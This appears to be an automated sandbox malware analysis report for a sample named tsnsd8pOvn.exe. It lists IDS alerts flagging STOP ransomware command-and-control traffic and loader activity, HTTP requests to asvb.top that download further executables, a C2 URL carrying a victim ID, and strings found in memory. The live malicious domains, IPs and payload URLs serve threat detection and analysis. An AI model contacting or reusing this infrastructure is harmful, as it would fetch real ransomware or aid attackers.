        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: tsnsd8pOvn.exe, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: 785491~1.PCQntkrnlmp.pdb5 source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\mpS source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: &5(C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb.pdbX source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\E source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: tsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\2 source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*] source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Micros source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wct425E.tmp.7.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ggZ source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp

        Spreading

        barindex
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52651 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:49717 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036334 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key : 192.168.2.6:52650 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52641 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.6:52646 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2020826 - Severity 1 - ET MALWARE Potential Dridex.Maldoc Minimal Executable Request : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2036333 - Severity 1 - ET MALWARE Win32/Vodkagats Loader Requesting Payload : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Malware configuration extractorURLs: http://asvb.top/nddddhsspen6/get.php
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 92.246.89.93 92.246.89.93
        Source: Joe Sandbox ViewASN Name: LIVECOMM-ASRespublikanskayastr3k6RU LIVECOMM-ASRespublikanskayastr3k6RU
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52651 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52639 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52641 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52650 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52645 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52648 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52643 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52640 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52652 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52646 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52654 -> 92.246.89.93:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52638 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:52636 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 188.114.97.3:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /files/penelop/updatewin1.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /files/penelop/updatewin2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /files/penelop/updatewin.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /files/penelop/3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /files/penelop/4.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: global trafficHTTP traffic detected: GET /files/penelop/5.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: asvb.top
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308067834.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308366967.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308505844.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
        Source: global trafficDNS traffic detected: DNS query: asvb.top
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/3.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/3.exe$
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/3.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/3.exerunu
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/4.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/4.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/4.exerun
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe$runk
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe$runndless_query_for_$
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe$runw
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe)
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exe0
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exeX
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exeXt
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exeY
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exederu
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exek
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exer
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/5.exerun
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin.exerunr
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin1.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin1.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin1.exerunl
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin2.exe
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin2.exe$run
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin2.exe.x
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/files/penelop/updatewin2.exerunx
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php638Z0
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php?pid=
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4O6.m
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4_7
        Source: tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://asvb.top/nddddhsspen6/get.phpvQ.lY
        Source: V0100005.log.7.drString found in binary or memory: http://cacerts.digicer
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: V0100005.log.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2Se
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
        Source: tsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
        Source: V01tmp.log.7.drString found in binary or memory: http://ocsp.digicert
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://ocsp.digicert.com0
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://ocsp.digicert.com0:
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://ocsp.digicert.com0H
        Source: V01tmp.log.7.drString found in binary or memory: http://ocsp.msocsp.com0
        Source: V0100005.log.7.drString found in binary or memory: http://ocsp.msocsp.com0S
        Source: tsnsd8pOvn.exe, 00000007.00000003.3307957618.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: http://www.digicert.com/CPS0~
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308137066.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308198972.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
